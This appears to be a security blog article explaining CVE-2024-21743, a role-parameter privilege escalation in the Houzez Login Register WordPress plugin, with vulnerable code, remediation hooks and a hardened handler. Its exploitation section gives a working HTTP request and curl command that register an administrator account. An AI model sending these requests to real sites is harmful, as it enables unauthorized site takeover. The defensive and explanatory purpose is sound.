CVE-2024-21743 - Privilege Escalation in Houzez Login Register Plugin (<= 3.2.5) — Exploit Details and Remediation

WordPress plugins are a big target for attackers because they can open doors to sites even when the WordPress core is up-to-date. In early 2024, a serious vulnerability (CVE-2024-21743) was discovered in the widely used Houzez Login Register plugin by Favethemes. This bug lets anyone increase their privileges—like turning an ordinary user into an admin—if the site is running any version up to *and including* 3.2.5.

In this article, we break down how the vulnerability works, provide code snippets, explain exploitation, and share how to protect your site.

What Is the Vulnerability (CVE-2024-21743)?

CVE-2024-21743 is a privilege escalation vulnerability in the Houzez Login Register plugin that affects every release up to and including version 3.2.5 (no earlier version was tracked separately, so all versions before 3.2.5 are affected as well).

In plain English:
A regular user (or even an attacker who registers freely) can trick the site into giving themselves admin privileges, which can lead to a total site takeover.

How Does The Vulnerability Work?

The core issue is that the plugin does not validate or restrict the role parameter that is submitted when a user registers for an account.

Here’s some simplified PHP code, similar to what’s found in the affected plugin (based on public research):

// Vulnerable registration handler (simplified)
$username = sanitize_user($_POST['username'] ?? '');
$email    = sanitize_email($_POST['email'] ?? '');
$password = $_POST['password'] ?? '';

// The role is read straight from the request body.
if (isset($_POST['role'])) {
    $user_role = sanitize_text_field($_POST['role']);
} else {
    $user_role = 'subscriber';
}

$user_id = wp_create_user($username, $password, $email);
if ($user_id && !is_wp_error($user_id)) {
    $user = new WP_User($user_id);
    $user->set_role($user_role); // <-- The problem: the client-supplied role is applied without any allow-list check
}

What goes wrong?
The code above takes the role field straight from the registration form. Anyone can send a registration request like:

POST /wp-admin/admin-ajax.php?action=register HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded

username=hacker&password=Password123!&email=hacker@badguy.com&role=administrator

The plugin sets the account’s role *exactly as requested*—so now hacker@badguy.com is a WordPress admin!

Exploitation Steps

1. Find a Target

Any WordPress site running Houzez Login Register <= 3.2.5 can be attacked if it allows account registration.

2. Register an Account with Admin Privileges

Send a POST request (as above) to create an account, but add the role=administrator parameter. Tools like Burp Suite, curl, or your browser's developer console can help.

curl Example

curl -X POST "https://victim-site.com/wp-admin/admin-ajax.php?action=register" \
  -d "username=eviladmin&password=StrongPassword!&email=evil@hacker.com&role=administrator"

3. Log In

Go to the WordPress login page and sign in with your new credentials. If vulnerable, you now have full admin access!

Remediation and Fix

Upgrade immediately:
As soon as a patched version is available, update the Houzez Login Register plugin (check the plugin's update page for new versions).

Temporary Fix (For Developers/Admins):
Until you can upgrade, you can add code to your theme’s functions.php to block users from registering as anything but a safe role:

// Temporary hardening: clamp any role assigned via WP_User::set_role() to a safe allow-list.
// The plugin calls set_role() after wp_create_user(), so hook set_user_role, not user_register.
add_action('set_user_role', function ($user_id, $role) {
    static $clamping = false; // guards against re-entering this hook from set_role() below
    if ($clamping || current_user_can('promote_users')
        || in_array($role, ['subscriber', 'customer', 'contributor'], true)) {
        return; // already safe, or a legitimate role change by an administrator
    }
    $clamping = true;
    (new WP_User($user_id))->set_role('subscriber');
    $clamping = false;
}, 10, 2);
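For plugin developers, the proper fix belongs in the registration handler itself: the server decides the role, and the client-supplied value is never consulted. The following is an added example of a hardened handler written for this article (not the plugin's patched code); the AJAX action name, nonce name and function names are assumptions.

```php
<?php
// Hardened counterpart of the vulnerable handler shown earlier (example code,
// not the plugin's source). The role comes from WordPress's own
// "New User Default Role" setting and is validated against a fixed allow-list.

function example_safe_register_handler() {
    // Assumed nonce action/field names; a real plugin defines its own.
    check_ajax_referer('example_register_nonce', 'security');

    $username = sanitize_user($_POST['username'] ?? '');
    $email    = sanitize_email($_POST['email'] ?? '');
    $password = $_POST['password'] ?? '';

    if ($username === '' || !is_email($email) || $password === '') {
        wp_send_json_error(['message' => 'Missing or invalid fields.'], 400);
    }

    // $_POST['role'] is deliberately ignored: the role is a server-side decision.
    $role = example_safe_default_role();

    $user_id = wp_create_user($username, $password, $email);
    if (is_wp_error($user_id)) {
        wp_send_json_error(['message' => $user_id->get_error_message()], 400);
    }

    // wp_create_user() already applies the default role; setting it again
    // makes the clamp explicit and independent of other plugins' filters.
    $user = new WP_User($user_id);
    $user->set_role($role);

    wp_send_json_success(['user_id' => $user_id]);
}

// Returns the site's default role if it is on the allow-list, otherwise 'subscriber'.
function example_safe_default_role() {
    $allowed = ['subscriber', 'customer', 'contributor'];
    $default = get_option('default_role', 'subscriber');
    return in_array($default, $allowed, true) ? $default : 'subscriber';
}

// Registration is performed by visitors who are not logged in, so use the nopriv hook.
add_action('wp_ajax_nopriv_example_register', 'example_safe_register_handler');
```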

Extra Steps

- Disable user registration if you don't need it (Settings > General > Uncheck "Anyone can register").


Final Thoughts

CVE-2024-21743 once again proves that plugin security is just as important as core WordPress security. If you or your clients are using Houzez Login Register, take action now to secure your site. Always keep plugins up-to-date and keep an eye out for critical security advisories.

Timeline

Published on: 09/17/2024 14:15:16 UTC
Last modified on: 09/20/2024 12:30:51 UTC